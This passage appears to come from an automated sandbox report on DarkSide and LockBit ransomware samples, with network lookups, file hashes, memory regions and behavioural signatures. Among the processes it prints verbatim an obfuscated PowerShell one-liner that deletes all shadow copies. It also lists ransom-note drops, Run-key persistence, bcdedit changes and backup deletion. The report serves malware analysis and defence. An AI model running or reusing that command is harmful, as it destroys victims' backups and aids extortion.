| US | 8.8.8.8:53 | 150.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.1.127.10.in-addr.arpa | udp |
| US | 13.248.169.48:443 | catsdegree.com | tcp |
| HK | 154.219.131.251:443 | temisleyes.com | tcp |
| US | 8.8.8.8:53 | 224.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
Files
memory/2780-0-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2780-8-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2324-10-0x00007FFC1B7D3000-0x00007FFC1B7D5000-memory.dmp
memory/2324-16-0x0000028144290000-0x00000281442B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgyqzljn.k4d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2324-21-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp
memory/2324-22-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp
memory/2780-23-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2324-24-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp
memory/2324-27-0x00007FFC1B7D0000-0x00007FFC1C291000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d34112a7b4df3c9e30ace966437c5e40 |
| SHA1 | ec07125ad2db8415cf2602d1a796dc3dfc8a54d6 |
| SHA256 | cd9665cdaf412455d6f8dbdb60c721d0cf2ac992f7cd4830d89e8c75f9cfbfbf |
| SHA512 | 49fd43e69ece9c8185ada6b6ea5bd8619cb2b31de49793d3bd80180ecf3cf8ad24cac6c494185c99623417de52465c832166f7a4890d36ac0f3be5bd7652e053 |
C:\Users\Admin\README.bf9fb421.TXT
| MD5 | f418a249405444da33cc73b402a26306 |
| SHA1 | 1a6c493e74036f93f0dae4b65e6c543c213ce418 |
| SHA256 | b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09 |
| SHA512 | b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf |
memory/2780-222-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2780-227-0x00000000002C0000-0x00000000002D7000-memory.dmp
memory/2780-229-0x00000000002C0000-0x00000000002D7000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win7-20240705-en
Max time kernel
1559s
Max time network
1568s
Command Line
Signatures
DarkSide
Renames multiple (150) files with added filename extension
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2384 wrote to memory of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2384 wrote to memory of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2384 wrote to memory of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2384 wrote to memory of 2316 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
memory/2384-0-0x0000000000E60000-0x0000000000E70000-memory.dmp
memory/2316-5-0x000007FEF594E000-0x000007FEF594F000-memory.dmp
memory/2316-6-0x000000001B5A0000-0x000000001B882000-memory.dmp
memory/2316-7-0x0000000002080000-0x0000000002088000-memory.dmp
memory/2316-8-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
memory/2316-9-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
memory/2316-10-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
memory/2316-11-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
memory/2384-12-0x0000000000E60000-0x0000000000E70000-memory.dmp
memory/2316-13-0x000007FEF5690000-0x000007FEF602D000-memory.dmp
C:\Users\README.a2dbc85c.TXT
| MD5 | 25d0b19a0ec34a39dfa3e177866f01a3 |
| SHA1 | a3704d1f6499738ccd694bdd6008a850c6b2e453 |
| SHA256 | f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8 |
| SHA512 | ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | db5976b09a5ea23bdc1f450ffbbec067 |
| SHA1 | 452cc01c049df3866f8edc2f8fe7f9d21dd93bd1 |
| SHA256 | 8f4986961c5abcac37cdc4ed1cdb5ded9b2f37cf3ff0bf8c5b8c5f2a162ca50f |
| SHA512 | 7a62f04742b572a40d2e162f18b8a759af26763a7e9cf78d700423a0f9289bafca4c459d3d93c157eea0eb281f03968c5ad7c566589c4f4d2e9d422094e35f97 |
memory/2384-209-0x0000000000E60000-0x0000000000E70000-memory.dmp
memory/2384-218-0x0000000000E60000-0x0000000000E70000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:13
Platform
win10v2004-20240704-en
Max time kernel
1661s
Max time network
1171s
Command Line
Signatures
Lockbit
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (6418) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\118C.tmp.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\Lang\et.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\legal\jdk\ecc.md | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_CatEye.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-400_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-16_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-60_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\meta-index | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-64_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019VL_KMS_Client_AE-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\modules\common.luac | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerSmallTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.1d9d722e.pri | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-72_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\telemetryrules\hxoutlook.exe_Rules.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\es-ES\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1808.3.0_x64__8wekyb3d8bbwe\Microsoft.Advertising\vpaid.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker32.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailMediumTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Templates\1033\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\82.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\processing.slk | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_start_a_coversation_v3.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-400.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected-hover.svg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7FR.dub | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeLargeTile.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_4.m4a | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyShare-Dark.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_KMS_Client-ul.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_WHATSNEW.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-125.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.scale-400.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Standard.targetsize-16_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-64_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
